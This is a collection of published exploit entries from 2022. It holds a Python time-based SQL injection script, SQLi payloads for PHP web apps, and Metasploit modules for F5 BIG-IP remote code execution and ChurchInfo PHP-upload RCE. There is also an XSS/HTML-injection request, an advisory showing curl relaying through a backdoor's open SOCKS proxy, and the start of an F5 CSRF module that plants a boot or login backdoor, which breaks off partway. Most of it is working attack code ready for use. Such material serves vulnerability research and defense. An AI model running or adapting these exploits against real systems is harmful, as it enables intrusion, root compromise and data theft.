<pre><code># Exploit Title: Helmet Store Showroom 1.0 - authenticated SQL Injection<br /># Date: 25-11-2022<br /># Exploit Author: syad<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 + XAMPP 3.2.4<br /># CVE ID : N/A<br /><br /># Description<br /><br /># The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.<br /><br /><br />import requests<br />import sys<br />import pyfiglet<br />sess = requests.Session()<br /><br /><br />proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}<br /><br />def login1(ip,username,password):<br /> x = "http://%s/hss/classes/Login.php?f=login" % ip<br /> login = {'username':username, 'password':password}<br /> r = sess.post(x, data=login, proxies=proxies)<br /> #print(r.content)<br /><br /><br /><br />def login(ip):<br /> x = ("http://%s/hss/admin") % ip<br /> r = sess.get(x,proxies=proxies)<br /> if "Welcome to Helmet Store Showroom - PHP" in r.text:<br /> print("--------------------------------------------")<br /> print("[+] Success Login")<br /> <br /><br />def detect_sql(ip):<br /> x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip<br /> r = sess.get(x,proxies=proxies)<br /> if "You have an error in your SQL syntax" in r.text:<br /> print("[+] Found SQL Error")<br /> <br /><br />def time_based_sqli(ip):<br /> x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip<br /> r = sess.get(x,proxies=proxies)<br /> print("[+] Time Based SQL Found")<br /> print("[*]!!! Time To Report !!!")<br /><br /><br /><br /><br /><br /> <br />if __name__ == "__main__":<br /> result = pyfiglet.figlet_format("PWN")<br /> print(result)<br /> try:<br /> ip = sys.argv[1].strip()<br /> username = sys.argv[2].strip()<br /> password = sys.argv[3].strip()<br /> except IndexError:<br /> print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])<br /> print("[-] Example: %s 192.168.1.x" % sys.argv[0])<br /> sys.exit(-1)<br /><br />login1(ip,username,password)<br />login(ip)<br />detect_sql(ip)<br />time_based_sqli(ip)<br /></code></pre>
<pre><code>## Title: SMS - PHP (by: oretnom23 ) v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 11.25.2022<br />## Vendor: https://github.com/oretnom23,<br />https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/download-code?nid=15770&title=Sanitization+Management+System+Project+in+PHP+and+MySQL+Free+Source+Code<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0<br /><br />## Description:<br />The `id` parameter appears to be vulnerable to SQL injection attacks.<br />The attacker can get all information from this system by using this<br />vulnerability.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: p=services/view_service&id=126664801' or '5968'='5975' OR<br />NOT 5461=5461 AND 'gEud'='gEud<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: p=services/view_service&id=126664801' or '5968'='5975' OR<br />(SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT<br />(ELT(5753=5753,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DEYy'='DEYy<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: p=services/view_service&id=126664801' or '5968'='5975'<br />AND (SELECT 6369 FROM (SELECT(SLEEP(5)))Rnfu) AND 'PUfi'='PUfi<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/rnfvjf)<br /><br />## Time spent<br />`00:30:00`<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator',<br /> 'Description' => %q{<br /> This module exploits a newline injection into an RPM .rpmspec file<br /> that permits authenticated users to remotely execute commands.<br /><br /> Successful exploitation results in remote code execution<br /> as the root user.<br /> },<br /> 'Author' => [<br /> 'Ron Bowes' # Discovery, PoC, and module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-41800'],<br /> ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],<br /> ['URL', 'https://support.f5.com/csp/article/K97843387'],<br /> ['URL', 'https://support.f5.com/csp/article/K13325942'],<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DisclosureDate' => '2022-11-16', # Vendor advisory<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [ 'Default', {} ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.<br /> 'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION], # One at a time<br /> 'SideEffects' => [<br /> IOC_IN_LOGS,<br /> ARTIFACTS_ON_DISK<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('HttpUsername', [true, 'iControl username', 'admin']),<br /> OptString.new('HttpPassword', [true, 'iControl password', ''])<br /> ]<br /> )<br /> end<br /><br /> def exploit<br /> # The RPM name is based on these, so we need these to delete the RPM file after<br /> name = rand_text_alphanumeric(5..10)<br /> version = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"<br /> release = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"<br /><br /> vprint_status('Creating an .rpmspec file on the target...')<br /> result = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'),<br /> 'ctype' => 'application/json',<br /> 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),<br /> 'data' => {<br /> 'specFileData' => {<br /> 'name' => name,<br /> 'srcBasePath' => '/tmp',<br /> 'version' => version,<br /> 'release' => release,<br /> # This is the injection - add newlines then a '%check' section<br /> 'description' => "\n\n%check\n#{payload.encoded}\n",<br /> 'summary' => rand_text_alphanumeric(5..10)<br /> }<br /> }.to_json<br /> })<br /><br /> fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result<br /> fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401<br /> fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code != 200<br /><br /> json = result&.get_json_document<br /> fail_with(Failure::UnexpectedReply, "Server didn't return valid JSON") unless json<br /><br /> file_path = json['specFilePath']<br /> fail_with(Failure::UnexpectedReply, "Server didn't return a specFilePath") unless file_path<br /> vprint_status("Created spec file: #{file_path}")<br /> register_file_for_cleanup(file_path)<br /><br /> # We can also use `exit 1` in the %check function to prevent this file<br /> # from being created, rather than cleaning it up.. but that seems noisier?<br /> # Neither option gets logged so /shrug<br /> register_file_for_cleanup("/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm")<br /><br /> vprint_status('Building the RPM to trigger the payload...')<br /> result = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'),<br /> 'ctype' => 'application/json',<br /> 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),<br /> 'data' => {<br /> 'state' => {},<br /> 'appName' => rand_text_alphanumeric(5..10),<br /> 'packageDirectory' => '/tmp',<br /> 'specFilePath' => file_path<br /> }.to_json<br /> })<br /> fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result<br /> fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401<br /> fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code < 200 || result.code > 299<br /> end<br />end<br /></code></pre>
<pre><code>## Title: Ecommerse-1.0 XSS-Reflected Hijack-credentials - JavaScript Injection<br />## Author: nu11secur1ty<br />## Date: 11.23.2022<br />## Vendor: https://github.com/winston-dsouza<br />## Software: https://github.com/winston-dsouza/ecommerce-website<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website<br /><br />## Description:<br />The value of the eMail request parameter is copied into the value of<br />an HTML tag attribute which is encapsulated in double quotation marks.<br />The attacker can trick the users of this system, very easy to visit a<br />very dangerous link from anywhere, and then the game will over for<br />these customers.<br />Also, the attacker can create a network from botnet computers by using<br />this vulnerability.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploit00:<br /><br />```POST<br />POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.com<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f<br />Origin: http://pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/ecommerce/index.php<br />Content-Type: application/x-www-form-urlencoded<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br />```<br />## Description01:<br />JavaScript can be injected into the application response (a vulnerable<br />app - signup_script.php, no sanitizing submit function).<br />The attacker can crash the MySQL server by sending large bites of POST<br />requests to the MySQL server of this system.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />## Real attack:<br /><br />[+] Exploit01:<br /><br />```POST<br />POST /ecommerce/signup_script.php HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f<br />Origin: http://pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/ecommerce/index.php<br />Content-Type: application/x-www-form-urlencoded<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 1070<br /><br />eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/3r4t36)<br /><br />## Real Exploit:<br />[href](https://streamable.com/n3b5ev)<br /><br />## Real Exploit - code insert:<br />[href](https://streamable.com/64dmo2)<br /><br />## Time spent<br />`1:45`<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/f312e3a436995b86b205a1a37b1bf10f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Backdoor.Win32.Serman.a<br />Vulnerability: Unauthenticated Open Proxy<br />Family: Serman<br />Type: PE32<br />MD5: f312e3a436995b86b205a1a37b1bf10f<br />Vuln ID: MVID-2022-0659<br />Disclosure: 11/22/2022<br />Description: The malware listens on TCP port 21422 by default but it can be changed. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.<br /><br />E.g. using port 5555<br /><br />SOCKS4 version 4A server (beta)<br />autor: Stanimir Jordanov * e-mail: stjordanov@hotmail.com<br />Usage: socks4 <LocalPort> [LogFile]<br /><br /><br />C:\dump>wwm.exe 5555 out.txt<br />SOCKS 4 service started: redirecting localhost:5555<br />Press Ctrl+C to end ...<br />Connecting to: 192.168.18.128:80 ID:2C34<br />Connected to: 192.168.18.128:80 ID:2C34<br />Connection closed ID:2C34<br />Connecting to: 192.168.18.128:80 ID:25BC<br />Connected to: 192.168.18.128:80 ID:25BC<br />Connection closed ID:25BC<br />Connecting to: 192.168.18.128:80 ID:A4<br />Connected to: 192.168.18.128:80 ID:A4<br />Connection closed ID:A4<br /><br /><br />Exploit/PoC:<br />Port scan:<br />Connecting to: 192.168.18.128:666 ID:2B04<br />Cannot connect to: 192.168.18.128:666 ID:2B04 <br />Connecting to: 192.168.18.128:21 ID:2DE4<br />Connected to: 192.168.18.128:21 ID:2DE4 <br />Connection closed ID:2DE4<br /><br />(Port scan):<br /><br />(Port closed):<br />C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:666 -v<br />* Trying 192.168.18.125:5555...<br />* SOCKS4 communication to 192.168.18.128:666<br />* SOCKS4 connect to IPv4 192.168.18.128 (locally resolved)<br />* Can't complete SOCKS4 connection to 0.0.0.0:0. (91), request rejected or failed.<br />* Closing connection 0<br />curl: (97) Can't complete SOCKS4 connection to 0.0.0.0:0. (91), request rejected or failed.<br /><br />(Port open):<br />C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:21 -v<br />* Trying 192.168.18.125:5555...<br />* SOCKS4 communication to 192.168.18.128:21<br />* SOCKS4 connect to IPv4 192.168.18.128 (locally resolved)<br />* SOCKS4 request granted.<br />* Connected to 192.168.18.125 (192.168.18.125) port 5555 (#0)<br />> GET / HTTP/1.1<br />> Host: 192.168.18.128:21<br />> User-Agent: curl/7.83.1<br />> Accept: */*<br />><br />* Received HTTP/0.9 when not allowed<br />* Closing connection 0<br />curl: (1) Received HTTP/0.9 when not allowed<br /><br /><br />(Download files):<br />C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128/DOOM.exe -v --output 2.txt<br />* Trying 192.168.18.125:5555...<br /> % Total % Received % Xferd Average Speed Time Time Time Current<br /> Dload Upload Total Spent Left Speed<br /> 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* SOCKS4 communication to 192.168.18.128:80<br />* SOCKS4 connect to IPv4 192.168.18.128 (locally resolved)<br />* SOCKS4 request granted.<br />* Connected to 192.168.18.125 (192.168.18.125) port 5555 (#0)<br /> GET /DOOM.exe HTTP/1.1<br /> Host: 192.168.18.128<br /> User-Agent: curl/7.83.1<br /> Accept: */*<br /> <br />* Mark bundle as not supporting multiuse<br />* HTTP 1.0, assume close after body<br /> HTTP/1.0 200 OK<br /> Server: SimpleHTTP/0.6 Python/2.7.6<br /> Date: Tue, 22 Nov 2022 02:15:31 GMT<br /> Content-type: application/x-msdos-program<br /> Content-Length: 103533<br /> Last-Modified: Sat, 03 Aug 2019 04:57:12 GMT<br /> <br />{ [6794 bytes data]<br />100 101k 100 101k 0 0 474k 0 --:--:-- --:--:-- --:--:-- 488k<br />* Closing connection 0<br /><br />C:\Users\gg\Desktop>2.txt<br />DOOMED!!!<br />Press any key to continue . . .<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'ChurchInfo 1.2.13-1.3.0 Authenticated RCE',<br /> 'Description' => %q{<br /> This module exploits the logic in the CartView.php page when crafting a draft email with an attachment.<br /> By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the<br /> ChurchInfo web server, which is accessible over the web by any user. By uploading a PHP attachment and<br /> then browsing to the location of the uploaded PHP file on the web server, arbitrary code<br /> execution as the web daemon user (e.g. www-data) can be achieved.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [ 'm4lwhere <m4lwhere@protonmail.com>' ],<br /> 'References' => [<br /> ['URL', 'http://www.churchdb.org/'],<br /> ['URL', 'http://sourceforge.net/projects/churchinfo/'],<br /> ['CVE', '2021-43258']<br /> ],<br /> 'Platform' => 'php',<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_PHP,<br /> 'Targets' => [['Automatic Targeting', { 'auto' => true }]],<br /> 'DisclosureDate' => '2021-10-30', # Reported to ChurchInfo developers on this date<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => ['CRASH_SAFE'],<br /> 'Reliability' => ['REPEATABLE_SESSION'],<br /> 'SideEffects' => ['ARTIFACTS_ON_DISK', 'IOC_IN_LOGS']<br /> }<br /> )<br /> )<br /> # Set the email subject and message if interested<br /> register_options(<br /> [<br /> Opt::RPORT(80),<br /> OptString.new('USERNAME', [true, 'Username for ChurchInfo application', 'admin']),<br /> OptString.new('PASSWORD', [true, 'Password to login with', 'churchinfoadmin']),<br /> OptString.new('TARGETURI', [true, 'The location of the ChurchInfo app', '/churchinfo/']),<br /> OptString.new('EMAIL_SUBJ', [true, 'Email subject in webapp', 'Read this now!']),<br /> OptString.new('EMAIL_MESG', [true, 'Email message in webapp', 'Hello there!'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> if datastore['SSL'] == true<br /> proto_var = 'https'<br /> else<br /> proto_var = 'http'<br /> end<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'Default.php'),<br /> 'method' => 'GET',<br /> 'vars_get' => {<br /> 'Proto' => proto_var,<br /> 'Path' => target_uri.path<br /> }<br /> )<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to a request to its login page!')<br /> end<br /><br /> # Check if page title is the one that ChurchInfo uses for its login page.<br /> if res.body.match(%r{<title>ChurchInfo: Login</title>})<br /> print_good('Target is ChurchInfo!')<br /> else<br /> return CheckCode::Safe('Target is not running ChurchInfo!')<br /> end<br /><br /> # Check what version the target is running using the upgrade pages.<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_14To1_3_0.php'),<br /> 'method' => 'GET'<br /> )<br /><br /> if res && (res.code == 500 || res.code == 200)<br /> return CheckCode::Vulnerable('Target is running ChurchInfo 1.3.0!')<br /> end<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_13To1_2_14.php'),<br /> 'method' => 'GET'<br /> )<br /><br /> if res && (res.code == 500 || res.code == 200)<br /> return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.14!')<br /> end<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_12To1_2_13.php'),<br /> 'method' => 'GET'<br /> )<br /><br /> if res && (res.code == 500 || res.code == 200)<br /> return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.13!')<br /> else<br /> return CheckCode::Safe('Target is not running a vulnerable version of ChurchInfo!')<br /> end<br /> end<br /><br /> #<br /> # The exploit method attempts a login, adds items to the cart, then creates the email attachment.<br /> # Adding items to the cart is required for the server-side code to accept the upload.<br /> #<br /> def exploit<br /> # Need to grab the PHP session cookie value first to pass to application<br /> vprint_status('Gathering PHP session cookie')<br /> if datastore['SSL'] == true<br /> vprint_status('SSL is true, changing protocol to HTTPS')<br /> proto_var = 'https'<br /> else<br /> vprint_status('SSL is false, leaving protocol as HTTP')<br /> proto_var = 'http'<br /> end<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'Default.php'),<br /> 'method' => 'GET',<br /> 'vars_get' => {<br /> 'Proto' => proto_var,<br /> 'Path' => datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + datastore['TARGETURI']<br /> },<br /> 'keep_cookies' => true<br /> )<br /><br /> # Ensure we get a 200 from the application login page<br /> unless res && res.code == 200<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unable to reach the ChurchInfo login page (response code: #{res.code})")<br /> end<br /><br /> # Check that we actually are targeting a ChurchInfo server.<br /> unless res.body.match(%r{<title>ChurchInfo: Login</title>})<br /> fail_with(Failure::NotVulnerable, 'Target is not a ChurchInfo!')<br /> end<br /><br /> # Grab our assigned session cookie<br /> cookie = res.get_cookies<br /> vprint_good("PHP session cookie is #{cookie}")<br /> vprint_status('Attempting login')<br /><br /> # Attempt a login with the cookie assigned, server will assign privs on server-side if authenticated<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'Default.php'),<br /> 'method' => 'POST',<br /> 'vars_post' => {<br /> 'User' => datastore['USERNAME'],<br /> 'Password' => datastore['PASSWORD'],<br /> 'sURLPath' => datastore['TARGETURI']<br /> }<br /> )<br /><br /> # A valid login will give us a 302 redirect to TARGETURI + /CheckVersion.php so check that.<br /> unless res && res.code == 302 && res.headers['Location'] == datastore['TARGETURI'] + '/CheckVersion.php'<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Check if credentials are correct (response code: #{res.code})")<br /> end<br /> vprint_good("Location header is #{res.headers['Location']}")<br /> print_good("Logged into application as #{datastore['USERNAME']}")<br /> vprint_status('Attempting exploit')<br /><br /> # We must add items to the cart before we can send the emails. This is a hard requirement server-side.<br /> print_status('Navigating to add items to cart')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'SelectList.php'),<br /> 'method' => 'GET',<br /> 'vars_get' => {<br /> 'mode' => 'person',<br /> 'AddAllToCart' => 'Add+to+Cart'<br /> }<br /> )<br /><br /> # Need to check that items were successfully added to the cart<br /> # Here we're looking through html for the version string, similar to:<br /> # Items in Cart: 2<br /> unless res && res.code == 200<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unable to add items to cart via HTTP GET request to SelectList.php (response code: #{res.code})")<br /> end<br /> cart_items = res.body.match(/Items in Cart: (?<cart>\d)/)<br /> unless cart_items<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Server did not respond with the text 'Items in Cart'. Is this a ChurchInfo server?")<br /> end<br /> if cart_items['cart'].to_i < 1<br /> print_error('No items in cart detected')<br /> fail_with(Failure::UnexpectedReply,<br /> 'Failure to add items to cart, no items were detected. Check if there are person entries in the application')<br /> end<br /> print_good("Items in Cart: #{cart_items}")<br /><br /> # Uploading exploit as temporary email attachment<br /> print_good('Uploading exploit via temp email attachment')<br /> payload_name = Rex::Text.rand_text_alphanumeric(5..14) + '.php'<br /> vprint_status("Payload name is #{payload_name}")<br /><br /> # Create the POST payload with required parameters to be parsed by the server<br /> post_data = Rex::MIME::Message.new<br /> post_data.add_part(payload.encoded, 'application/octet-stream', nil,<br /> "form-data; name=\"Attach\"; filename=\"#{payload_name}\"")<br /> post_data.add_part(datastore['EMAIL_SUBJ'], '', nil, 'form-data; name="emailsubject"')<br /> post_data.add_part(datastore['EMAIL_MESG'], '', nil, 'form-data; name="emailmessage"')<br /> post_data.add_part('Save Email', '', nil, 'form-data; name="submit"')<br /> file = post_data.to_s<br /> file.strip!<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'CartView.php'),<br /> 'method' => 'POST',<br /> 'data' => file,<br /> 'ctype' => "multipart/form-data; boundary=#{post_data.bound}"<br /> )<br /><br /> # Ensure that we get a 200 and the intended payload was<br /> # successfully uploaded and attached to the draft email.<br /> unless res.code == 200 && res.body.include?("Attach file:</b> #{payload_name}")<br /> fail_with(Failure::Unknown, 'Failed to upload the payload.')<br /> end<br /> print_good("Exploit uploaded to #{target_uri.path + 'tmp_attach/' + payload_name}")<br /><br /> # Have our payload deleted after we exploit<br /> register_file_for_cleanup(payload_name)<br /><br /> # Make a GET request to the PHP file that was uploaded to execute it on the target server.<br /> print_good('Executing payload with GET request')<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'tmp_attach', payload_name),<br /> 'method' => 'GET'<br /> )<br /> rescue ::Rex::ConnectionError<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'F5 BIG-IP iControl CSRF File Write SOAP API',<br /> 'Description' => %q{<br /> This module exploits a cross-site request forgery (CSRF) vulnerability<br /> in F5 Big-IP's iControl interface to write an arbitrary file to the<br /> filesystem.<br /><br /> While any file can be written to any location as root, the<br /> exploitability is limited by SELinux; the vast majority of writable<br /> locations are unavailable. By default, we write to a script that<br /> executes at reboot, which means the payload will execute the next time<br /> the server boots.<br /><br /> An alternate target - Login - will add a backdoor that executes next<br /> time a user logs in interactively. This overwrites a file,<br /> but we restore it when we get a session<br /><br /> Note that because this is a CSRF vulnerability, it starts a web<br /> server, but an authenticated administrator must visit the site, which<br /> redirects them to the target.<br /> },<br /> 'Author' => [<br /> 'Ron Bowes' # Discovery, PoC, and module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-41622'],<br /> ['URL', 'https://github.com/rbowes-r7/refreshing-soap-exploit'],<br /> ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],<br /> ['URL', 'https://support.f5.com/csp/article/K97843387'],<br /> ['URL', 'https://support.f5.com/csp/article/K94221585'],<br /> ['URL', 'https://support.f5.com/csp/article/K05403841'],<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DisclosureDate' => '2022-11-16', # Vendor advisory<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD],<br /> 